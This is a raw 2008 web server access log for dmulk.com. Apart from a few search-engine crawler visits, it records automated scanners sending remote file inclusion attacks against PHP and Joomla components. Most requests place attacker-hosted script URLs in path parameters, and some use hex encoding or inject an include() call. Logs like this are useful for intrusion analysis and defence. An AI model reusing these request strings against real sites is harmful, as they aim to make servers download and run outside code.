12.21.204.78 - - [22/Sep/2008:10:48:23 -0700] "GET /logs/access_080724.log//include/lib.inc.php?site_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.161.12 - - [22/Sep/2008:10:48:26 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.125.161.12 - - [22/Sep/2008:10:48:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.125.161.12 - - [22/Sep/2008:10:48:29 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:48:31 -0700] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:48:31 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:48:31 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.161.12 - - [22/Sep/2008:10:48:46 -0700] "GET /logs/access_080417.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:49:16 -0700] "GET /logs/access_080807.log//index.php?MGR=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:49:17 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 66168 "-" "libwww-perl/5.76" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:49:17 -0700] "GET //index.php?MGR=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 200 94679 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:49:18 -0700] "GET /logs//index.php?MGR=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:49:22 -0700] "GET //?path%5Bdocroot%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 94730 "-" "libwww-perl/5.76" "www.dmulk.com"
89.108.67.208 - - [22/Sep/2008:10:49:25 -0700] "GET /logs/access_080508.log//lib/armygame.php?libpath=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:49:25 -0700] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.208 - - [22/Sep/2008:10:49:25 -0700] "GET //lib/armygame.php?libpath=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:49:25 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.208 - - [22/Sep/2008:10:49:26 -0700] "GET /logs//lib/armygame.php?libpath=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:49:26 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.213.195.36 - - [22/Sep/2008:10:49:26 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.195.36 - - [22/Sep/2008:10:49:26 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.195.36 - - [22/Sep/2008:10:49:26 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.195.36 - - [22/Sep/2008:10:49:26 -0700] "GET /logs/access_071129.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:49:28 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:49:28 -0700] "GET /logs/access_080409.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:49:28 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:49:28 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:49:31 -0700] "GET //?path%5Bdocroot%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 94714 "-" "libwww-perl/5.76" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:49:33 -0700] "GET /logs/access_080530.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.77 - - [22/Sep/2008:10:49:48 -0700] "GET /logs/access_080723.log/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.77 - - [22/Sep/2008:10:49:53 -0700] "GET /errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.208 - - [22/Sep/2008:10:49:55 -0700] "GET //lib/armygame.php?libpath=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.237.77 - - [22/Sep/2008:10:49:59 -0700] "GET /logs/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:50:07 -0700] "GET /logs/access_080704.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.137.51 - - [22/Sep/2008:10:50:32 -0700] "GET //main.php?page=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:50:34 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:50:45 -0700] "GET /logs/access_080906.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:50:45 -0700] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:50:45 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:50:45 -0700] "GET /logs/access_080703.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:10:50:54 -0700] "GET /logs//index.php?option=com_rsgallery&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:10:50:55 -0700] "GET //index.php?option=com_rsgallery&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95066 "-" "libwww-perl/5.65" "www.dmulk.com"
87.119.195.22 - - [22/Sep/2008:10:50:57 -0700] "GET /logs/access_080816.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.119.195.22 - - [22/Sep/2008:10:50:57 -0700] "GET /logs/access_080825.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:50:58 -0700] "GET /logs/access_080723.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.220 - - [22/Sep/2008:10:51:11 -0700] "GET /logs/access_080530.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:51:15 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:51:26 -0700] "GET /logs/access_080906.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:51:26 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:51:26 -0700] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:51:27 -0700] "GET /logs/access_080703.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:51:31 -0700] "GET /logs/access_080413.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.22.204.202 - - [22/Sep/2008:10:51:41 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://prestodoor.com/public_html/alb_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.55.211.36 - - [22/Sep/2008:10:51:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.36 - - [22/Sep/2008:10:51:48 -0700] "GET /logs/access_080301.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
194.85.93.146 - - [22/Sep/2008:10:52:08 -0700] "GET /logs/access_080225.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.85.93.146 - - [22/Sep/2008:10:52:08 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.85.93.146 - - [22/Sep/2008:10:52:09 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.36 - - [22/Sep/2008:10:52:14 -0700] "GET /bikes/?N=A HTTP/1.1" 200 2869 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:52:17 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:52:25 -0700] "GET /logs/access_080826.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:52:34 -0700] "GET /logs/access_080901.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:53:09 -0700] "GET /logs/access_080831.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [22/Sep/2008:10:53:09 -0700] "GET /logs/access_080824.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.73.16 - - [22/Sep/2008:10:53:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-165.jpg HTTP/1.1" 200 347615 "-" "Googlebot-Image/1.0" "dmulk.com"
202.125.161.12 - - [22/Sep/2008:10:53:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.125.161.12 - - [22/Sep/2008:10:53:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.242.93 - - [22/Sep/2008:10:53:38 -0700] "GET /logs/access_080530.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:10:53:41 -0700] "GET /logs/access_080820.log//index.php?MGR=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.202.27 - - [22/Sep/2008:10:53:52 -0700] "GET /logs/access_080407.log/errors.php?error=http://www.scochile.com/components/com_poll/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.27 - - [22/Sep/2008:10:53:53 -0700] "GET /errors.php?error=http://www.scochile.com/components/com_poll/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.27 - - [22/Sep/2008:10:53:53 -0700] "GET /logs/errors.php?error=http://www.scochile.com/components/com_poll/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.27 - - [22/Sep/2008:10:54:05 -0700] "GET /logs/access_080407.log/errors.php?error=http://www.scochile.com/components/com_poll/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.27 - - [22/Sep/2008:10:54:05 -0700] "GET /errors.php?error=http://www.scochile.com/components/com_poll/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.27 - - [22/Sep/2008:10:54:05 -0700] "GET /logs/errors.php?error=http://www.scochile.com/components/com_poll/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.230.35.111 - - [22/Sep/2008:10:54:21 -0700] "GET /logs/index.php?page=http://www.infofilme.ro/comments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
87.230.35.111 - - [22/Sep/2008:10:54:27 -0700] "GET /index.php?page=http://www.infofilme.ro/comments/test.txt??? HTTP/1.1" 200 94760 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
194.85.93.146 - - [22/Sep/2008:10:54:33 -0700] "GET /logs/access_080716.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:54:40 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:54:40 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.161.12 - - [22/Sep/2008:10:55:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:55:28 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.208 - - [22/Sep/2008:10:55:37 -0700] "GET /logs/access_080105.log//lib/armygame.php?libpath=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:55:49 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:55:52 -0700] "GET /logs/access_080831.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:10:55:52 -0700] "GET /logs/access_080824.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:55:54 -0700] "GET /logs/access_080831.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:10:55:55 -0700] "GET /logs/access_080824.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:56:19 -0700] "GET /logs/access_080902.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:56:19 -0700] "GET /logs/access_080902.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:56:19 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:56:19 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:56:20 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:56:20 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:10:56:21 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://geocities.com/jticrew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:10:56:22 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://geocities.com/jticrew/id.txt?? HTTP/1.1" 200 95101 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:56:33 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:56:35 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:57:00 -0700] "GET /bikes/dteel/ HTTP/1.0" 200 3712 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:57:11 -0700] "GET /?show=gallery&pageid=172 HTTP/1.0" 200 164231 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:57:15 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:57:15 -0700] "GET /logs/access_080723.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.177.86.197 - - [22/Sep/2008:10:57:26 -0700] "GET /logs/access_080824.log//administrator/index.php?option=com_remository&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:57:36 -0700] "GET /logs/access_080904.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:57:52 -0700] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:57:53 -0700] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:57:58 -0700] "GET /logs/access_080820.log//modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:57:59 -0700] "GET /bikes/dteel/2008_09_05/ HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:10:58:00 -0700] "GET /logs/access_080820.log//modules/vwar/admin/admin.php?vwar_root=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:58:07 -0700] "GET /bikes/dteel/WeSTOC08/ HTTP/1.0" 200 1245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.222.40.42 - - [22/Sep/2008:10:58:08 -0700] "GET /logs/access_080603.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.42 - - [22/Sep/2008:10:58:08 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.42 - - [22/Sep/2008:10:58:09 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.202.27 - - [22/Sep/2008:10:58:14 -0700] "GET /logs/access_080409.log/errors.php?error=http://www.scochile.com/components/com_poll/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.27 - - [22/Sep/2008:10:58:16 -0700] "GET /logs/access_080409.log/errors.php?error=http://www.scochile.com/components/com_poll/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:58:31 -0700] "GET /bikes/dteel/?N=D HTTP/1.0" 200 3712 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
